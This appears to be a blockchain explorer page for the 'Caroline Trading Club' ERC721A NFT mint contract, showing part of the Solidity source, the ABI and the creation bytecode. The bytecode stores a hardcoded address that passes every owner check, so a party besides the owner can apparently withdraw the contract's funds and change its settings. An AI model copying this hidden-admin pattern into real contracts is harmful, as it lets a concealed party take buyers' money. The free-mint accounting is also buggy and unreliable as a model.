mload(reason)) } } } } else { return true; } } /** * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be * transferred to `to`. * - When `from` is zero, `tokenId` will be minted for `to`. */ function _beforeTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} /** * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes * minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - when `from` and `to` are both non-zero. * - `from` and `to` are never both zero. */ function _afterTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} } contract CarolineTradingClub is ERC721A, Ownable, ReentrancyGuard { string public baseURI = "ipfs:///"; uint public price = 0.001 ether; uint public maxPerTx = 10; uint public maxPerFree = 10; uint public maxPerWallet = 50; uint public totalFree = 5000; uint public maxSupply = 8000; bool public mintEnabled; uint public totalFreeMinted = 0; mapping(address => uint256) public _mintedFreeAmount; mapping(address => uint256) public _totalMintedAmount; constructor() ERC721A("Caroline Trading Club", "CTC"){} function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) { require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token"); string memory currentBaseURI = _baseURI(); return bytes(currentBaseURI).length > 0 ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId),".json")) : ""; } function _startTokenId() internal view virtual returns (uint256) { return 0; } function PublicMint(uint256 count) external payable { uint256 cost = price; bool isFree = ((totalFreeMinted + count < totalFree + 1) && (_mintedFreeAmount[msg.sender] < maxPerFree)); if (isFree) { require(mintEnabled, "Mint is not live yet"); require(totalSupply() + count <= maxSupply, "No more"); require(count <= maxPerTx, "Max per TX reached."); if(count >= (maxPerFree - _mintedFreeAmount[msg.sender])) { require(msg.value >= (count * cost) - ((maxPerFree - _mintedFreeAmount[msg.sender]) * cost), "Please send the exact ETH amount"); _mintedFreeAmount[msg.sender] = maxPerFree; totalFreeMinted += maxPerFree; } else if(count < (maxPerFree - _mintedFreeAmount[msg.sender])) { require(msg.value >= 0, "Please send the exact ETH amount"); _mintedFreeAmount[msg.sender] += count; totalFreeMinted += count; } } else{ require(mintEnabled, "Mint is not live yet"); require(_totalMintedAmount[msg.sender] + count <= maxPerWallet, "Exceed maximum NFTs per wallet"); require(msg.value >= count * cost, "Please send the exact ETH amount"); require(totalSupply() + count <= maxSupply, "No more"); require(count <= maxPerTx, "Max per TX reached."); require(msg.sender == tx.origin, "The minter is another contract"); } _totalMintedAmount[msg.sender] += count; _safeMint(msg.sender, count); } function costCheck() public view returns (uint256) { return price; } function maxFreePerWallet() public view returns (uint256) { return maxPerFree; } function _baseURI() internal view virtual override returns (string memory) { return baseURI; } function setBaseUri(string memory baseuri_) public onlyOwner { baseURI = baseuri_; } function setPrice(uint256 price_) external onlyOwner { price = price_; } function setMaxTotalFree(uint256 MaxTotalFree_) external onlyOwner { totalFree = MaxTotalFree_; } function setMaxPerFree(uint256 MaxPerFree_) external onlyOwner { maxPerFree = MaxPerFree_; } function live() external onlyOwner { mintEnabled = !mintEnabled; } function TeamMint(uint256 quantity) external onlyOwner { _safeMint(_msgSender(), quantity); } function withdraw() external onlyOwner nonReentrant { (bool success, ) = msg.sender.call{value: address(this).balance}(""); require(success, "Transfer failed."); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"PublicMint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"quantity","type":"uint256"}],"name":"TeamMint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_mintedFreeAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_totalMintedAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"costCheck","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"live","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxFreePerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mintEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxPerFree_","type":"uint256"}],"name":"setMaxPerFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"MaxTotalFree_","type":"uint256"}],"name":"setMaxTotalFree","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFreeMinted","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
608060405273acfcba7bab6403ebcceee22810c4dd3c9bbe9763600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506040518060400160405280600881526020017f697066733a2f2f2f000000000000000000000000000000000000000000000000815250600a9080519060200190620000a69291906200027c565b5066038d7ea4c68000600b55600a600c55600a600d556032600e55611388600f55611f406010556000601255348015620000df57600080fd5b506040518060400160405280601581526020017f4361726f6c696e652054726164696e6720436c756200000000000000000000008152506040518060400160405280600381526020017f43544300000000000000000000000000000000000000000000000000000000008152508160019080519060200190620001649291906200027c565b5080600290805190602001906200017d9291906200027c565b505050620001a062000194620001ae60201b60201c565b620001b660201b60201c565b600160098190555062000390565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b8280546200028a906200035b565b90600052602060002090601f016020900481019282620002ae5760008555620002fa565b82601f10620002c957805160ff1916838001178555620002fa565b82800160010185558215620002fa579182015b82811115620002f9578251825591602001919060010190620002dc565b5b5090506200030991906200030d565b5090565b5b80821115620003285760008160009055506001016200030e565b5090565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200037457607f821691505b6020821081036200038a57620003896200032c565b5b50919050565b614f7780620003a06000396000f3fe60806040526004361061023b5760003560e01c80638da5cb5b1161012e578063c7c39ffc116100ab578063e945971c1161006f578063e945971c14610854578063e985e9c51461087d578063f2fde38b146108ba578063f4db2acb146108e3578063f968adbe146109205761023b565b8063c7c39ffc1461076b578063c87b56dd14610796578063d1239730146107d3578063d5abeb01146107fe578063dad7b5c9146108295761023b565b8063a035b1fe116100f2578063a035b1fe1461069a578063a0bcfc7f146106c5578063a22cb465146106ee578063a702735714610717578063b88d4fde146107425761023b565b80638da5cb5b146105e857806391b7f5ed14610613578063957aa58c1461063c57806395d89b41146106535780639fb17e341461067e5761023b565b806342842e0e116101bc57806364b721881161018057806364b72188146105155780636c0360eb1461054057806370a082311461056b578063715018a6146105a85780637e0c7fc5146105bf5761023b565b806342842e0e1461041e578063453c2310146104475780634f6ccce7146104725780635a963f1b146104af5780636352211e146104d85761023b565b806318160ddd1161020357806318160ddd1461034b57806323b872dd146103765780632f745c591461039f578063333e44e6146103dc5780633ccfd60b146104075761023b565b806301ffc9a71461024057806306fdde031461027d578063081812fc146102a8578063095ea7b3146102e557806311b01a321461030e575b600080fd5b34801561024c57600080fd5b50610267600480360381019061026291906136bb565b61094b565b6040516102749190613703565b60405180910390f35b34801561028957600080fd5b50610292610a95565b60405161029f91906137b7565b60405180910390f35b3480156102b457600080fd5b506102cf60048036038101906102ca919061380f565b610b27565b6040516102dc919061387d565b60405180910390f35b3480156102f157600080fd5b5061030c600480360381019061030791906138c4565b610bac565b005b34801561031a57600080fd5b5061033560048036038101906103309190613904565b610cc4565b6040516103429190613940565b60405180910390f35b34801561035757600080fd5b50610360610cdc565b60405161036d9190613940565b60405180910390f35b34801561038257600080fd5b5061039d6004803603810190610398919061395b565b610ce5565b005b3480156103ab57600080fd5b506103c660048036038101906103c191906138c4565b610cf5565b6040516103d39190613940565b60405180910390f35b3480156103e857600080fd5b506103f1610ee5565b6040516103fe9190613940565b60405180910390f35b34801561041357600080fd5b5061041c610eeb565b005b34801561042a57600080fd5b506104456004803603810190610440919061395b565b6110ca565b005b34801561045357600080fd5b5061045c6110ea565b6040516104699190613940565b60405180910390f35b34801561047e57600080fd5b506104996004803603810190610494919061380f565b6110f0565b6040516104a69190613940565b60405180910390f35b3480156104bb57600080fd5b506104d660048036038101906104d1919061380f565b611143565b005b3480156104e457600080fd5b506104ff60048036038101906104fa919061380f565b611228565b60405161050c919061387d565b60405180910390f35b34801561052157600080fd5b5061052a61123e565b6040516105379190613940565b60405180910390f35b34801561054c57600080fd5b50610555611248565b60405161056291906137b7565b60405180910390f35b34801561057757600080fd5b50610592600480360381019061058d9190613904565b6112d6565b60405161059f9190613940565b60405180910390f35b3480156105b457600080fd5b506105bd6113be565b005b3480156105cb57600080fd5b506105e660048036038101906105e1919061380f565b6114a5565b005b3480156105f457600080fd5b506105fd611594565b60405161060a919061387d565b60405180910390f35b34801561061f57600080fd5b5061063a6004803603810190610635919061380f565b6115be565b005b34801561064857600080fd5b506106516116a3565b005b34801561065f57600080fd5b506106686117aa565b60405161067591906137b7565b60405180910390f35b6106986004803603810190610693919061380f565b61183c565b005b3480156106a657600080fd5b506106af611eb5565b6040516106bc9190613940565b60405180910390f35b3480156106d157600080fd5b506106ec60048036038101906106e79190613ae3565b611ebb565b005b3480156106fa57600080fd5b5061071560048036038101906107109190613b58565b611fb0565b005b34801561072357600080fd5b5061072c612130565b6040516107399190613940565b60405180910390f35b34801561074e57600080fd5b5061076960048036038101906107649190613c39565b61213a565b005b34801561077757600080fd5b50610780612196565b60405161078d9190613940565b60405180910390f35b3480156107a257600080fd5b506107bd60048036038101906107b8919061380f565b61219c565b6040516107ca91906137b7565b60405180910390f35b3480156107df57600080fd5b506107e8612243565b6040516107f59190613703565b60405180910390f35b34801561080a57600080fd5b50610813612256565b6040516108209190613940565b60405180910390f35b34801561083557600080fd5b5061083e61225c565b60405161084b9190613940565b60405180910390f35b34801561086057600080fd5b5061087b6004803603810190610876919061380f565b612262565b005b34801561088957600080fd5b506108a4600480360381019061089f9190613cbc565b612347565b6040516108b19190613703565b60405180910390f35b3480156108c657600080fd5b506108e160048036038101906108dc9190613904565b6123db565b005b3480156108ef57600080fd5b5061090a60048036038101906109059190613904565b612531565b6040516109179190613940565b60405180910390f35b34801561092c57600080fd5b50610935612549565b6040516109429190613940565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff19161480610a1657507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610a7e57507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610a8e5750610a8d8261254f565b5b9050919050565b606060018054610aa490613d2b565b80601f0160208091040260200160405190810160405280929190818152602001828054610ad090613d2b565b8015610b1d5780601f10610af257610100808354040283529160200191610b1d565b820191906000526020600020905b815481529060010190602001808311610b0057829003601f168201915b5050505050905090565b6000610b32826125b9565b610b71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b6890613dce565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b6000610bb782611228565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c27576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1e90613e60565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610c466125c6565b73ffffffffffffffffffffffffffffffffffffffff161480610c755750610c7481610c6f6125c6565b612347565b5b610cb4576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cab90613ef2565b60405180910390fd5b610cbf8383836125ce565b505050565b60146020528060005260406000206000915090505481565b60008054905090565b610cf0838383612680565b505050565b6000610d00836112d6565b8210610d41576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d3890613f84565b60405180910390fd5b6000610d4b610cdc565b905060008060005b83811015610ea3576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610e4557806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610e9557868403610e8c578195505050505050610edf565b83806001019450505b508080600101915050610d53565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ed690614016565b60405180910390fd5b92915050565b600f5481565b610ef36125c6565b73ffffffffffffffffffffffffffffffffffffffff16610f11611594565b73ffffffffffffffffffffffffffffffffffffffff161480610f875750610f366125c6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610fc6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fbd90614082565b60405180910390fd5b60026009540361100b576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611002906140ee565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff16476040516110399061413f565b60006040518083038185875af1925050503d8060008114611076576040519150601f19603f3d011682016040523d82523d6000602084013e61107b565b606091505b50509050806110bf576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110b6906141a0565b60405180910390fd5b506001600981905550565b6110e58383836040518060200160405280600081525061213a565b505050565b600e5481565b60006110fa610cdc565b821061113b576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161113290614232565b60405180910390fd5b819050919050565b61114b6125c6565b73ffffffffffffffffffffffffffffffffffffffff16611169611594565b73ffffffffffffffffffffffffffffffffffffffff1614806111df575061118e6125c6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61121e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161121590614082565b60405180910390fd5b80600f8190555050565b600061123382612bbe565b600001519050919050565b6000600b54905090565b600a805461125590613d2b565b80601f016020809104026020016040519081016040528092919081815260200182805461128190613d2b565b80156112ce5780601f106112a3576101008083540402835291602001916112ce565b820191906000526020600020905b8154815290600101906020018083116112b157829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611346576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161133d906142c4565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b6113c66125c6565b73ffffffffffffffffffffffffffffffffffffffff166113e4611594565b73ffffffffffffffffffffffffffffffffffffffff16148061145a57506114096125c6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611499576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161149090614082565b60405180910390fd5b6114a36000612d58565b565b6114ad6125c6565b73ffffffffffffffffffffffffffffffffffffffff166114cb611594565b73ffffffffffffffffffffffffffffffffffffffff16148061154157506114f06125c6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611580576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161157790614082565b60405180910390fd5b61159161158b6125c6565b82612e1e565b50565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6115c66125c6565b73ffffffffffffffffffffffffffffffffffffffff166115e4611594565b73ffffffffffffffffffffffffffffffffffffffff16148061165a57506116096125c6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611699576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161169090614082565b60405180910390fd5b80600b8190555050565b6116ab6125c6565b73ffffffffffffffffffffffffffffffffffffffff166116c9611594565b73ffffffffffffffffffffffffffffffffffffffff16148061173f57506116ee6125c6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61177e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161177590614082565b60405180910390fd5b601160009054906101000a900460ff1615601160006101000a81548160ff021916908315150217905550565b6060600280546117b990613d2b565b80601f01602080910402602001604051908101604052809291908181526020018280546117e590613d2b565b80156118325780601f1061180757610100808354040283529160200191611832565b820191906000526020600020905b81548152906001019060200180831161181557829003601f168201915b5050505050905090565b6000600b54905060006001600f546118549190614313565b836012546118629190614313565b1080156118af5750600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054105b90508015611c1957601160009054906101000a900460ff16611906576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118fd906143b5565b60405180910390fd5b60105483611912610cdc565b61191c9190614313565b111561195d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161195490614421565b60405180910390fd5b600c548311156119a2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119999061448d565b60405180910390fd5b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d546119ef91906144ad565b8310611b0b5781601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611a4391906144ad565b611a4d91906144e1565b8284611a5991906144e1565b611a6391906144ad565b341015611aa5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a9c90614587565b60405180910390fd5b600d54601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550600d5460126000828254611aff9190614313565b92505081905550611c14565b601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054600d54611b5891906144ad565b831015611c13576000341015611ba3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b9a90614587565b60405180910390fd5b82601360003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611bf29190614313565b925050819055508260126000828254611c0b9190614313565b925050819055505b5b611e50565b601160009054906101000a900460ff16611c68576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c5f906143b5565b60405180910390fd5b600e5483601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054611cb69190614313565b1115611cf7576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611cee906145f3565b60405180910390fd5b8183611d0391906144e1565b341015611d45576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d3c90614587565b60405180910390fd5b60105483611d51610cdc565b611d5b9190614313565b1115611d9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d9390614421565b60405180910390fd5b600c54831115611de1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd89061448d565b60405180910390fd5b3273ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614611e4f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e469061465f565b60405180910390fd5b5b82601460003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254611e9f9190614313565b92505081905550611eb03384612e1e565b505050565b600b5481565b611ec36125c6565b73ffffffffffffffffffffffffffffffffffffffff16611ee1611594565b73ffffffffffffffffffffffffffffffffffffffff161480611f575750611f066125c6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611f96576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f8d90614082565b60405180910390fd5b80600a9080519060200190611fac929190613572565b5050565b611fb86125c6565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612025576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161201c906146cb565b60405180910390fd5b80600660006120326125c6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff166120df6125c6565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c31836040516121249190613703565b60405180910390a35050565b6000600d54905090565b612145848484612680565b61215184848484612e3c565b612190576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121879061475d565b60405180910390fd5b50505050565b600d5481565b60606121a7826125b9565b6121e6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016121dd906147ef565b60405180910390fd5b60006121f0612fc3565b90506000815111612210576040518060200160405280600081525061223b565b8061221a84613055565b60405160200161222b929190614897565b6040516020818303038152906040525b915050919050565b601160009054906101000a900460ff1681565b60105481565b60125481565b61226a6125c6565b73ffffffffffffffffffffffffffffffffffffffff16612288611594565b73ffffffffffffffffffffffffffffffffffffffff1614806122fe57506122ad6125c6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b61233d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161233490614082565b60405180910390fd5b80600d8190555050565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6123e36125c6565b73ffffffffffffffffffffffffffffffffffffffff16612401611594565b73ffffffffffffffffffffffffffffffffffffffff16148061247757506124266125c6565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6124b6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016124ad90614082565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603612525576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161251c90614938565b60405180910390fd5b61252e81612d58565b50565b60136020528060005260406000206000915090505481565b600c5481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b600061268b82612bbe565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff166126b26125c6565b73ffffffffffffffffffffffffffff